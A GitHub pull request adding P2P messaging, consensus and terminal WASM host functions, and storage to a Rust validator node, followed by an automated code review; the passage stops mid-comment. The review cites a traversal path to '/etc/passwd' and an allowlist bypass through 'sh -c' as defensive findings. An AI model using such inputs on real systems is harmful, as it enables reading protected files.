feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges#45

Closed
echobt wants to merge 4 commits into main from feat/p2p-wasm-host-infra

Conversation


echobt (Contributor) commented Feb 18, 2026

Summary

Implement comprehensive P2P infrastructure and WASM host function support so that future WASM challenges can operate end-to-end on the decentralized network without any centralized server. This adds new host function namespaces, extends the P2P message protocol, and enriches consensus state for full challenge lifecycle management.

Changes

WASM Runtime (crates/wasm-runtime-interface/)

  • New consensus.rs: platform_consensus host function namespace with ConsensusPolicy, ConsensusState, and ConsensusHostFunctions — exposes consensus_get_epoch, consensus_get_validators, consensus_propose_weight, consensus_get_votes, consensus_get_state_hash, consensus_get_submission_count, consensus_get_block_height
  • New terminal.rs: platform_terminal host function namespace with TerminalPolicy, TerminalState, and TerminalHostFunctions — implements terminal_exec, terminal_read_file, terminal_write_file, terminal_list_dir, terminal_get_time, terminal_random_seed with path/command allow-listing
  • Updated sandbox.rs: Implement HostFunctionRegistrar for SandboxHostFunctions with real Wasmtime linker registration for sandbox_exec, get_timestamp, log_message
  • Updated runtime.rs: Register all new host function namespaces (consensus, terminal, sandbox, exec, time) in WasmRuntime::instantiate(); add ConsensusState and TerminalState to RuntimeState; add ConsensusPolicy and TerminalPolicy to InstanceConfig
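A minimal sketch of the linker registration these modules now perform (the namespace and function name follow the list above; the RuntimeState shape and the exact signature are assumptions, not the PR's actual code):

```rust
use wasmtime::{Caller, Linker};

// Assumed, simplified per-instance state; the real RuntimeState also carries
// TerminalState, policies, and memory plumbing.
struct RuntimeState {
    epoch: u64,
}

fn register_consensus(linker: &mut Linker<RuntimeState>) -> anyhow::Result<()> {
    // The guest imports this as (import "platform_consensus" "consensus_get_epoch").
    linker.func_wrap(
        "platform_consensus",
        "consensus_get_epoch",
        |caller: Caller<'_, RuntimeState>| -> i64 { caller.data().epoch as i64 },
    )?;
    Ok(())
}
```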

P2P Consensus (crates/p2p-consensus/)

  • Extended P2PMessage enum (appended at end for bincode backward compatibility): JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate, StorageProposal, StorageVote — with full message structs
  • Extended ChainState: Added leaderboard, active_jobs, task_progress, challenge_storage_roots fields with methods assign_job(), complete_job(), update_leaderboard(), get_leaderboard(), update_task_progress(), update_challenge_storage_root(), cleanup_stale_jobs() — all with proper sequence increment and hash update
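To illustrate the mutate-then-increment pattern those methods share, a sketch with heavily simplified types (only the method and field names come from this PR; the struct internals are assumed):

```rust
use std::collections::HashMap;

struct JobRecord {
    submission_id: String,
    timeout_at: i64,
}

struct ChainState {
    sequence: u64,
    active_jobs: HashMap<String, JobRecord>,
}

impl ChainState {
    fn update_hash(&mut self) { /* re-derive state_hash from current fields */ }

    fn increment_sequence(&mut self) {
        self.sequence += 1;
        self.update_hash();
    }

    // Every mutation bumps the sequence so peers can order state updates.
    fn assign_job(&mut self, job: JobRecord) {
        self.active_jobs.insert(job.submission_id.clone(), job);
        self.increment_sequence();
    }

    fn cleanup_stale_jobs(&mut self, now_ms: i64) -> usize {
        let before = self.active_jobs.len();
        self.active_jobs.retain(|_, job| job.timeout_at > now_ms);
        let removed = before - self.active_jobs.len();
        if removed > 0 {
            self.increment_sequence();
        }
        removed
    }
}
```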

Validator Node (bins/validator-node/)

  • New challenge_storage.rs: ChallengeStorageBackend implementing StorageBackend trait backed by real LocalStorage from distributed-storage — replaces NoopStorageBackend for production use
  • Extended main.rs: Handle all new P2P message types in handle_network_event() with proper logging and state updates; add stale job cleanup periodic task (120s interval); handle previously unmatched messages (StateRequest, StateResponse, WeightVote, PeerAnnounce)
  • Updated wasm_executor.rs: Wire ConsensusPolicy and TerminalPolicy into InstanceConfig; upgrade storage backend from NoopStorageBackend to InMemoryStorageBackend
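The periodic cleanup task can be wired up roughly like this; the closure-based shape is an assumption, only the 120 s cadence comes from the PR:

```rust
use std::time::Duration;

/// Spawn a periodic sweep; `cleanup` is whatever closure performs the actual
/// stale-job removal (here, something like ChainState::cleanup_stale_jobs
/// behind a shared-state handle).
fn spawn_stale_job_cleanup<F>(mut cleanup: F) -> tokio::task::JoinHandle<()>
where
    F: FnMut() -> usize + Send + 'static,
{
    tokio::spawn(async move {
        let mut ticker = tokio::time::interval(Duration::from_secs(120));
        loop {
            ticker.tick().await;
            let removed = cleanup();
            if removed > 0 {
                tracing::info!(removed, "cleaned up stale jobs");
            }
        }
    })
}
```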

Challenge SDK WASM (crates/challenge-sdk-wasm/)

  • Updated host_functions.rs: Add platform_consensus extern block with all consensus host function imports and safe Rust wrappers (host_consensus_get_epoch, host_consensus_get_validators, host_consensus_propose_weight, etc.)
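A sketch of the import/wrapper pairing this describes; the namespace and function names come from the PR, while the raw signatures are assumptions:

```rust
// Raw imports resolved by the host's platform_consensus namespace.
#[link(wasm_import_module = "platform_consensus")]
extern "C" {
    fn consensus_get_epoch() -> i64;
    fn consensus_propose_weight(uid: i32, weight: i32) -> i32;
}

/// Safe wrapper: negative status codes from the host surface as errors.
pub fn host_consensus_propose_weight(uid: u16, weight: u16) -> Result<(), i32> {
    let status = unsafe { consensus_propose_weight(uid as i32, weight as i32) };
    if status < 0 {
        Err(status)
    } else {
        Ok(())
    }
}

pub fn host_consensus_get_epoch() -> u64 {
    (unsafe { consensus_get_epoch() }) as u64
}
```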

Notes

  • New P2PMessage variants are added at the end of the enum to maintain bincode serialization backward compatibility
  • No breaking changes to EvaluationInput/EvaluationOutput serialization format
  • ChallengeStorageBackend is placed in validator-node (not wasm-runtime-interface) to avoid a cyclic dependency through distributed-storage → platform-core → wasm-runtime-interface
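The bincode point above can be made concrete with a toy example, assuming bincode 1.x's default variant-index encoding:

```rust
use serde::{Deserialize, Serialize};

// bincode (v1) encodes an enum as its variant index followed by the payload,
// so bytes written before the change still decode as long as new variants
// are only appended, never inserted or reordered.
#[derive(Serialize, Deserialize)]
enum MessageV1 {
    Ping(u64),
}

#[derive(Serialize, Deserialize)]
enum MessageV2 {
    Ping(u64),
    JobClaim(String), // appended: existing variant indices are unchanged
}

fn main() {
    let old_bytes = bincode::serialize(&MessageV1::Ping(7)).unwrap();
    let decoded: MessageV2 = bincode::deserialize(&old_bytes).unwrap();
    assert!(matches!(decoded, MessageV2::Ping(7)));
}
```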

Summary by CodeRabbit

Release Notes

  • New Features

    • Added job assignment and task progress tracking system for distributed challenge evaluation.
    • Introduced per-challenge leaderboards to track miner performance and rankings.
    • Added challenge storage system for persistent data management across challenges.
    • Expanded consensus state access for challenges to query epoch, block height, validators, and votes.
    • Implemented terminal command execution for sandboxed challenge execution environments.
  • Chores

    • Enhanced peer-to-peer messaging infrastructure to support new challenge lifecycle messages.
    • Updated validator node configuration for improved policy management.

echobt and others added 4 commits February 18, 2026 07:25
… exec, and time host functions

- Add consensus and terminal module declarations and re-exports in lib.rs
- Add ConsensusPolicy and TerminalPolicy fields to InstanceConfig with defaults
- Add ConsensusState and TerminalState fields to RuntimeState
- Create consensus_state and terminal_state in instantiate()
- Register exec, time, consensus, terminal, and sandbox host functions in linker
…torage for decentralized challenges

Implement comprehensive P2P infrastructure in platform-v2 so that future WASM
challenges can operate end-to-end without any centralized server. This replaces
the centralized HTTP/PostgreSQL patterns from term-challenge with P2P equivalents.

WASM Runtime (wasm-runtime-interface):
- Add consensus.rs: ConsensusPolicy, ConsensusState, ConsensusHostFunctions with
  platform_consensus namespace (get_epoch, get_validators, propose_weight,
  get_votes, get_state_hash, get_submission_count, get_block_height)
- Add terminal.rs: TerminalPolicy, TerminalState, TerminalHostFunctions with
  platform_terminal namespace (terminal_exec, read_file, write_file, list_dir,
  get_time, random_seed) with path/command allow-listing
- Implement SandboxHostFunctions HostFunctionRegistrar (sandbox.rs) with real
  Wasmtime linker registration for sandbox_exec, get_timestamp, log_message
- Add ChallengeStorageBackend (storage.rs) backed by real LocalStorage from
  distributed-storage, replacing NoopStorageBackend for production use
- Register ConsensusPolicy and TerminalPolicy in InstanceConfig and RuntimeState
- Fix formatting across consensus.rs, sandbox.rs, terminal.rs

P2P Consensus (p2p-consensus):
- Extend ChainState with leaderboard, active_jobs, task_progress, and
  challenge_storage_roots fields for full challenge lifecycle tracking
- Add JobRecord, JobStatus, TaskProgressRecord, LeaderboardEntry types
- Add state methods: assign_job, complete_job, update_leaderboard,
  get_leaderboard, update_task_progress, update_challenge_storage_root,
  cleanup_stale_jobs — all with proper sequence increment
- Add P2PMessage variants (appended at end for bincode compatibility):
  JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress,
  TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate,
  StorageProposal, StorageVote — with full message structs

Validator Node (validator-node):
- Handle all new P2P message types in handle_network_event() with proper
  logging and state updates (JobAssignment creates jobs, TaskProgress
  updates state, etc.)
- Handle previously unmatched messages: StateRequest, StateResponse,
  WeightVote, PeerAnnounce (replacing catch-all debug log)
- Add stale job cleanup periodic task (120s interval)
- Update WasmChallengeExecutor to use InMemoryStorageBackend (upgraded from
  NoopStorageBackend) and wire ConsensusPolicy/TerminalPolicy into config

Challenge SDK WASM (challenge-sdk-wasm):
- Add platform_consensus extern block with all consensus host function imports
- Add safe Rust wrappers: host_consensus_get_epoch, host_consensus_get_validators,
  host_consensus_propose_weight, host_consensus_get_votes, etc.
- Fix minor formatting in host_functions.rs

No breaking changes to existing EvaluationInput/EvaluationOutput serialization.
New P2PMessage variants added at end of enum for backward compatibility.
… dependency

Move ChallengeStorageBackend from wasm-runtime-interface/storage.rs to
bins/validator-node/src/challenge_storage.rs. This resolves the cyclic
dependency: platform-core -> wasm-runtime-interface -> distributed-storage
-> platform-core. The ChallengeStorageBackend depends on distributed-storage
types (LocalStorage, StorageKey, etc.) which validator-node already depends on
directly, so it belongs there rather than in the generic WASM runtime crate.

Add sha2 dependency to validator-node for the hash computation in
propose_write(). Fix clippy needless_borrows_for_generic_args warnings
by removing unnecessary & on hex::encode() calls.

coderabbitai bot commented Feb 18, 2026

📝 Walkthrough


This PR introduces a comprehensive job lifecycle and consensus framework for the validator node, adding support for challenge storage, job/task tracking, and new WASM host functions for consensus and terminal operations. It extends P2P messaging with eleven new message types, enhances state management with leaderboards and job records, and integrates policy-driven consensus and terminal execution capabilities into the WASM runtime.

Changes

  • Dependency Management (bins/validator-node/Cargo.toml, crates/wasm-runtime-interface/Cargo.toml): Added sha2 workspace dependency; fixed a malformed dependency declaration in wasm-runtime-interface.
  • Challenge Storage Backend (bins/validator-node/src/challenge_storage.rs): New module implementing the ChallengeStorageBackend adapter for LocalStorage with get, propose_write (returning a SHA-256 hash), and delete operations; converts storage errors to StorageHostError.
  • Validator Node Main (bins/validator-node/src/main.rs): Integrated the challenge_storage module; expanded P2P message handling for 11 new message types (job, task, leaderboard, storage, and data operations); added a periodic stale-job cleanup interval; creates and persists JobRecord and TaskProgressRecord on the respective events.
  • WASM Executor Configuration (bins/validator-node/src/wasm_executor.rs): Added ConsensusPolicy and TerminalPolicy fields to WasmChallengeExecutor; propagated the policies through instance_config initialization in the execute methods.
  • WASM Host Functions (SDK) (crates/challenge-sdk-wasm/src/host_functions.rs): New public wrapper functions for consensus operations: get_epoch, get_validators, propose_weight, get_votes, get_state_hash, get_submission_count, get_block_height; buffers allocated for array-based results with error propagation.
  • P2P Consensus Messages (crates/p2p-consensus/src/messages.rs): Added 11 new message variants to the P2PMessage enum (JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest/Response, ChallengeUpdate, StorageProposal, StorageVote) with corresponding public struct definitions; added a signing_bytes() method to SignedP2PMessage.
  • P2P Network Message Routing (crates/p2p-consensus/src/network.rs): Extended the expected_signer mapping to cover all 11 new message variants for signature verification alignment.
  • P2P State Management (crates/p2p-consensus/src/state.rs): Introduced LeaderboardEntry, JobRecord, the JobStatus enum, and TaskProgressRecord; extended ChainState with leaderboard, active_jobs, task_progress, and challenge_storage_roots collections; added assign_job, complete_job, update_leaderboard, update_task_progress, update_challenge_storage_root, and cleanup_stale_jobs methods.
  • P2P Consensus Public API (crates/p2p-consensus/src/lib.rs): Expanded re-exports to include the 11 new message types plus JobRecord, JobStatus, LeaderboardEntry, and TaskProgressRecord from the messages and state modules.
  • WASM Runtime Consensus (crates/wasm-runtime-interface/src/consensus.rs): New 438-line module providing consensus host functions (epoch, validators, weight proposals, votes, state hash, submission count, block height); includes the ConsensusHostStatus enum, a ConsensusPolicy struct with factory methods (default, development, read_only), ConsensusState for tracking chain state, and a HostFunctionRegistrar implementation with policy enforcement and WASM memory I/O.
  • WASM Runtime Terminal (crates/wasm-runtime-interface/src/terminal.rs): New 733-line module providing terminal host functions (exec, read_file, write_file, list_dir, get_time, random_seed); includes the TerminalHostStatus enum, a TerminalPolicy struct with command/path whitelisting and resource limits, TerminalState for tracking usage, and a HostFunctionRegistrar implementation with policy enforcement and per-challenge deterministic seeds.
  • WASM Runtime Sandbox (crates/wasm-runtime-interface/src/sandbox.rs): Extended with SandboxExecRequest/Response/Error types for command execution; added get_timestamp and log_message host functions; implemented a full command execution pipeline with policy validation, timeout enforcement, and stdin/stdout/stderr handling (475 lines total).
  • WASM Runtime Integration (crates/wasm-runtime-interface/src/runtime.rs, crates/wasm-runtime-interface/src/lib.rs): Updated InstanceConfig with consensus_policy and terminal_policy fields; added consensus_state and terminal_state to RuntimeState; integrated ConsensusHostFunctions, TerminalHostFunctions, and the expanded SandboxHostFunctions registration; added public re-exports for the new consensus and terminal APIs.

Sequence Diagram(s)

sequenceDiagram
    participant Validator as Validator Node
    participant Consensus as Consensus Module
    participant Storage as LocalStorage
    participant WASM as WASM Runtime
    
    Validator->>Consensus: Receive JobAssignment message
    Consensus->>Consensus: Create JobRecord (submission_id, timeout_at, Pending)
    Consensus->>Storage: Persist job record to state
    Consensus->>Validator: Push state update
    
    loop Every interval
        Validator->>Consensus: Cleanup stale jobs (cleanup_stale_jobs)
        Consensus->>Consensus: Identify jobs past timeout_at
        Consensus->>Consensus: Mark as TimedOut, remove from active_jobs
        Consensus->>Validator: Return cleaned job count
    end
    
    Validator->>Consensus: Receive TaskProgress message
    Consensus->>Consensus: Create TaskProgressRecord (task_index, progress_pct)
    Consensus->>Storage: Update task_progress collection
    Consensus->>Validator: Refresh state hash
sequenceDiagram
    participant Guest as WASM Guest
    participant HostFunctions as Host Functions Registry
    participant ConsensusState as Consensus State
    participant TerminalState as Terminal State
    participant Policy as Policy Checker
    
    Guest->>HostFunctions: Call consensus_propose_weight(uid, weight)
    HostFunctions->>Policy: Check consensus_policy.allow_weight_proposals
    Policy-->>HostFunctions: Policy enabled?
    HostFunctions->>ConsensusState: Increment weight_proposals_made
    HostFunctions->>Policy: Check max_weight_proposals limit
    Policy-->>HostFunctions: Limit exceeded?
    alt Limit not exceeded
        HostFunctions->>ConsensusState: Record proposed_weight
        HostFunctions-->>Guest: Return Success (0)
    else Limit exceeded
        HostFunctions-->>Guest: Return ProposalLimitExceeded (-2)
    end
    
    Guest->>HostFunctions: Call terminal_exec(cmd)
    HostFunctions->>Policy: Check terminal_policy.allowed_commands
    Policy-->>HostFunctions: Command allowed?
    HostFunctions->>Policy: Check max_executions limit
    Policy-->>HostFunctions: Execution count OK?
    alt All checks pass
        HostFunctions->>TerminalState: Execute command (with timeout)
        HostFunctions->>TerminalState: Update bytes_written
        HostFunctions-->>Guest: Write SandboxExecResponse to WASM memory
    else Policy violation
        HostFunctions-->>Guest: Return TerminalHostStatus error
    end
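The policy-enforcement flow in the second diagram reduces to a small status-code function. A sketch under assumed types, with status values matching the review comments below:

```rust
struct ConsensusPolicy {
    allow_weight_proposals: bool,
    max_weight_proposals: u32,
}

struct ConsensusState {
    weight_proposals_made: u32,
    proposed_weights: Vec<(u16, u16)>,
}

fn handle_propose_weight(
    policy: &ConsensusPolicy,
    state: &mut ConsensusState,
    uid: u16,
    weight: u16,
) -> i32 {
    if !policy.allow_weight_proposals {
        return 1; // Disabled (the review below argues this should be negative)
    }
    if state.weight_proposals_made >= policy.max_weight_proposals {
        return -2; // ProposalLimitExceeded
    }
    state.weight_proposals_made += 1;
    state.proposed_weights.push((uid, weight));
    0 // Success
}
```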

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~75 minutes

Poem

🐰 A rabbit hops through storage gates,
Jobs and tasks at every state,
Consensus whispers, terminals sing,
WASM functions dancing in a ring! ✨
State flows deep, like morning dew—
The validator's dream comes true!

🚥 Pre-merge checks: ✅ 2 passed | ❌ 1 warning

❌ Failed checks (1 warning)

  • Docstring Coverage ⚠️ Warning: docstring coverage is 28.57%, below the required threshold of 80.00%. Resolution: write docstrings for the functions that are missing them.

✅ Passed checks (2 passed)

  • Description Check ✅ Passed: check skipped because CodeRabbit's high-level summary is enabled.
  • Title Check ✅ Passed: the title clearly summarizes the main changes (adding P2P handlers, WASM host functions, and distributed storage for decentralized challenges), which aligns with the infrastructure changes across multiple crates.


coderabbitai bot left a comment

Actionable comments posted: 11

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
crates/p2p-consensus/src/state.rs (1)

237-261: ⚠️ Potential issue | 🟠 Major

update_hash does not incorporate new state fields, weakening integrity verification.

The HashInput struct only includes sequence, epoch, validator_count, challenge_count, pending_count, and netuid. The newly added fields — leaderboard, active_jobs, task_progress, and challenge_storage_roots — are never reflected in the state hash. This means apply_sync_state (line 745) cannot detect tampering with these fields since the hash verification won't catch modifications.

Consider extending HashInput to include counts or digests of the new collections:

Proposed fix sketch
         #[derive(Serialize)]
         struct HashInput {
             sequence: SequenceNumber,
             epoch: u64,
             validator_count: usize,
             challenge_count: usize,
             pending_count: usize,
             netuid: u16,
+            active_jobs_count: usize,
+            leaderboard_count: usize,
+            task_progress_count: usize,
+            storage_roots_count: usize,
         }
 
         let input = HashInput {
             sequence: self.sequence,
             epoch: self.epoch,
             validator_count: self.validators.len(),
             challenge_count: self.challenges.len(),
             pending_count: self.pending_evaluations.len(),
             netuid: self.netuid,
+            active_jobs_count: self.active_jobs.len(),
+            leaderboard_count: self.leaderboard.len(),
+            task_progress_count: self.task_progress.len(),
+            storage_roots_count: self.challenge_storage_roots.len(),
         };
🧹 Nitpick comments (2)
crates/p2p-consensus/src/state.rs (1)

656-660: update_task_progress calls update_hash() instead of increment_sequence() — inconsistent with sibling methods.

All other mutation methods (assign_job, complete_job, update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call increment_sequence(). This method only calls update_hash(), which won't increment the sequence number. If this is intentional (to reduce sequence churn for frequent progress updates), a brief comment explaining the rationale would help. Otherwise, consider aligning with the other methods.

bins/validator-node/src/main.rs (1)

799-827: Stub handlers — several new message types are log-only with no processing.

StateRequest, StateResponse, WeightVote, and PeerAnnounce handlers only log and discard the message. For StateRequest in particular, the expected behavior is to respond with the current state. Consider adding TODO comments to track the remaining implementation work.

Would you like me to open issues to track implementing the response logic for these message types?
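A sketch of the direction suggested for the StateRequest arm; every type here is hypothetical scaffolding, only the intent (answer with the current state instead of dropping the request) follows the comment:

```rust
struct StateSnapshot;

struct StateRequest {
    requester: String,
}

trait Network {
    fn send_state_response(&mut self, to: &str, snapshot: StateSnapshot) -> Result<(), String>;
}

fn handle_state_request<N: Network>(req: &StateRequest, current: StateSnapshot, net: &mut N) {
    // Respond with the node's current state rather than just logging.
    if let Err(e) = net.send_state_response(&req.requester, current) {
        eprintln!("failed to answer StateRequest from {}: {e}", req.requester);
    }
}
```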

🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@bins/validator-node/src/challenge_storage.rs`:
- Around line 42-46: The current hash construction in the block that creates a
Sha256 hasher (Sha256::new(), then hasher.update(challenge_id.as_bytes()),
hasher.update(key), hasher.update(value), hasher.finalize()) concatenates fields
without delimiters and can cause boundary collisions; change the hashing to
include unambiguous separators or length prefixes (e.g., write the length of
challenge_id, key, and value before each field or insert a fixed sentinel byte
between fields) so the input to hasher.update is canonical and
collision-resistant; update the code around the hasher usage (the hasher
variable and the three hasher.update(...) calls) to apply this length-prefix or
delimiter strategy and then finalize as before.

In `@bins/validator-node/src/main.rs`:
- Around line 874-897: The TaskProgress handler is mutating state without
verifying the progress.signature; before calling state.update_task_progress
(inside the P2PMessage::TaskProgress arm where TaskProgressRecord is built),
validate the signature on progress using the validator's public key and a
canonical serialization of the progress data (e.g., submission_id, challenge_id,
task_index, total_tasks, status, progress_pct, timestamp) and only call
state_manager.apply/update_task_progress if signature verification succeeds; if
verification fails, log and discard the message. Ensure you perform the check on
progress.signature and use the existing signature verification utility in the
codebase (or add one) so the verification occurs prior to creating/updating the
TaskProgressRecord and invoking state.update_task_progress.
- Around line 836-855: Replace the hardcoded 300_000 timeout in the
JobAssignment handler with a named constant (e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to
improve clarity and maintainability: define the constant near related types or
at module scope and use it when computing JobRecord.timeout_at (currently set as
assignment.timestamp + 300_000) so it becomes assignment.timestamp +
JOB_ASSIGNMENT_TIMEOUT_MS; update any related comments or docs and leave
signature verification untouched since it's handled in
handle_gossipsub_message().

In `@crates/challenge-sdk-wasm/src/host_functions.rs`:
- Around line 234-242: The wrappers host_consensus_get_validators,
host_consensus_get_votes and host_consensus_get_state_hash treat a returned
status of 1 (ConsensusHostStatus::Disabled) as success and truncate the buffer;
update each function to treat status == 1 as an error (i.e., return Err(status))
rather than truncating/returning data — only treat genuinely successful status
values as success (e.g., status > 1 for payload-returning calls), and keep the
existing negative-error check; change the conditional around the unsafe
consensus_* call in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.

In `@crates/wasm-runtime-interface/src/consensus.rs`:
- Around line 253-274: handle_propose_weight currently only checks uid and
weight are non-negative and then casts them to u16, causing silent truncation;
update handle_propose_weight to validate that both uid and weight are within
u16::MAX before casting (e.g., check uid <= u16::MAX and weight <= u16::MAX),
return ConsensusHostStatus::InvalidArgument.to_i32() if out of range, and only
then cast to u16 when pushing into
caller.data_mut().consensus_state.proposed_weights while leaving the other logic
(policy checks, weight_proposals_made increment) unchanged.
- Around line 30-39: The enum ConsensusHostStatus has a positive value for
Disabled which breaks the SDK convention that non-success statuses are negative;
change ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another
unused negative code) and update any conversion/mapper (e.g., from_i32 or match
arms that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.

In `@crates/wasm-runtime-interface/src/sandbox.rs`:
- Around line 428-456: The current synchronous write_all to child.stdin after
spawning (in the block referencing cmd.spawn(), has_stdin, request.stdin,
write_all and child.stdin) can deadlock if the child fills stdout/stderr buffers
before reading stdin; move stdin writing off the main thread by spawning a
dedicated thread to take child.stdin, write_all the bytes, and then drop/close
it (or use wait_with_output which concurrently handles stdio) before entering
the existing timeout loop that polls child.try_wait() and uses wait_with_output;
ensure the writer thread is detached or joined appropriately and that errors
from the write are converted to SandboxExecError::ExecutionFailed so the
timeout/kill logic (start, timeout, child.kill,
SandboxExecError::ExecutionTimeout) still functions correctly.

In `@crates/wasm-runtime-interface/src/terminal.rs`:
- Around line 30-43: TerminalHostStatus::Disabled is currently set to a positive
value (1) which breaks the SDK's error-detection pattern (status < 0); change
the Disabled variant in the TerminalHostStatus enum to a negative error code
(e.g., -8 or another unused negative value) so it is treated as an error by SDK
wrappers like host_terminal_exec, and update any related docs/tests/constants
that assume the old value.
- Around line 139-147: The is_path_allowed function currently checks prefixes
with path.starts_with(p) which allows path traversal like "/tmp/../etc/passwd";
change the check to compare normalized/canonicalized paths: normalize the
incoming path (resolve "."/".." components and make it absolute) and normalize
the stored allowed_paths before comparison (or canonicalize both using
std::fs::canonicalize where possible), and on any canonicalization/error return
false; update the same prefix-check logic in the other occurrence of this
permission check so comparisons use normalized absolute paths rather than raw
starts_with.
- Around line 565-600: handle_terminal_random_seed currently uses
chrono::Utc::now() when fixed_timestamp_ms is None which yields
non-deterministic seeds across validators; change to only use deterministic
inputs (challenge_id and a deterministic per-call counter stored on
RuntimeState) and fail if fixed_timestamp_ms is not set or omit timestamp
entirely. Specifically: in handle_terminal_random_seed, remove the chrono::Utc
fallback and instead read a call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
- Around line 283-375: handle_terminal_exec currently validates only the first
token (command_name) but then runs the entire cmd_str via "sh -c", and it blocks
on child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.

---

Outside diff comments:
In `@crates/p2p-consensus/src/state.rs`:
- Around line 237-261: The state hash in update_hash currently omits new fields
(leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the
HashInput used in update_hash to include deterministic representations of those
fields (e.g., counts and/or a digest/hash of their contents) so mutations are
reflected in state_hash; update the HashInput struct to add fields like
leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest,
task_progress_count/task_progress_digest,
challenge_storage_roots_count/challenge_storage_roots_digest, populate them from
self (using lengths and a stable serialization + hash for digests via the
existing hash_data helper), and keep apply_sync_state verification working
against the updated state_hash.

---

Nitpick comments:
In `@bins/validator-node/src/main.rs`:
- Around line 799-827: Handlers for P2PMessage::StateRequest,
P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce
are currently no-ops that only debug-log and drop the message; add explicit TODO
comments and stub call sites and implement immediate behavior: for
P2PMessage::StateRequest(req) call a new or existing handle_state_request(req)
that prepares and sends the current state response, for
P2PMessage::StateResponse(resp) call handle_state_response(resp) to
validate/merge remote state or enqueue for processing, for
P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or
forward the vote, and for P2PMessage::PeerAnnounce(pa) call
handle_peer_announce(pa) to update peer table and dial addresses; include clear
TODO markers in each branch and return early only after invoking the appropriate
handler so future work is tracked and the request/response path for StateRequest
is functional.

In `@crates/p2p-consensus/src/state.rs`:
- Around line 656-660: The method update_task_progress currently calls
update_hash() but all other mutating methods (assign_job, complete_job,
update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call
increment_sequence(); update_task_progress should be changed to call
increment_sequence() after inserting the record to keep sequence behavior
consistent, or if the omission is intentional add a concise comment in
update_task_progress explaining why sequence should not be incremented (e.g., to
avoid sequence churn for frequent progress updates) so future readers understand
the rationale.

Comment on lines +42 to +46
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(key);
hasher.update(value);
Ok(hasher.finalize().into())

⚠️ Potential issue | 🟡 Minor

Hash over concatenated fields without delimiters can produce collisions.

SHA256(challenge_id || key || value) without length-prefixed or delimited fields is theoretically susceptible to boundary confusion (e.g., challenge_id="ab" + key=[0x63] produces the same hash input as challenge_id="abc" + key=[]). Practical risk is low if challenge IDs are UUIDs, but for correctness it's worth adding a separator or length prefix.

Proposed fix
         let mut hasher = Sha256::new();
         hasher.update(challenge_id.as_bytes());
+        hasher.update(b":");
         hasher.update(key);
+        hasher.update(b":");
         hasher.update(value);
         Ok(hasher.finalize().into())
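A sketch of the length-prefix alternative, which stays unambiguous even if a field can contain the delimiter byte:

```rust
use sha2::{Digest, Sha256};

fn storage_write_hash(challenge_id: &str, key: &[u8], value: &[u8]) -> [u8; 32] {
    let mut hasher = Sha256::new();
    // Prefix each field with its length so field boundaries are unambiguous.
    for field in [challenge_id.as_bytes(), key, value] {
        hasher.update((field.len() as u64).to_le_bytes());
        hasher.update(field);
    }
    hasher.finalize().into()
}
```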

Comment on lines +836 to +855
P2PMessage::JobAssignment(assignment) => {
info!(
submission_id = %assignment.submission_id,
challenge_id = %assignment.challenge_id,
assigned_validator = %assignment.assigned_validator.to_hex(),
assigner = %assignment.assigner.to_hex(),
"Received job assignment"
);
let job = JobRecord {
submission_id: assignment.submission_id.clone(),
challenge_id: assignment.challenge_id,
assigned_validator: assignment.assigned_validator,
assigned_at: assignment.timestamp,
timeout_at: assignment.timestamp + 300_000,
status: JobStatus::Pending,
};
state_manager.apply(|state| {
state.assign_job(job);
});
}

⚠️ Potential issue | 🟡 Minor

Extract job assignment timeout to a named constant.

The assignment.timestamp + 300_000 is a hardcoded 5-minute timeout that should be extracted to a named constant for clarity and maintainability.

Signature verification is already handled at the network layer in handle_gossipsub_message(), which validates all incoming messages before they reach the handlers, so no additional verification is needed here.

Proposed constant extraction
+/// Default job assignment timeout in milliseconds (5 minutes)
+const JOB_ASSIGNMENT_TIMEOUT_MS: i64 = 300_000;
+
 // ... in the handler:
-                    timeout_at: assignment.timestamp + 300_000,
+                    timeout_at: assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS,

Comment on lines +874 to +897
P2PMessage::TaskProgress(progress) => {
debug!(
submission_id = %progress.submission_id,
challenge_id = %progress.challenge_id,
validator = %progress.validator.to_hex(),
task_index = progress.task_index,
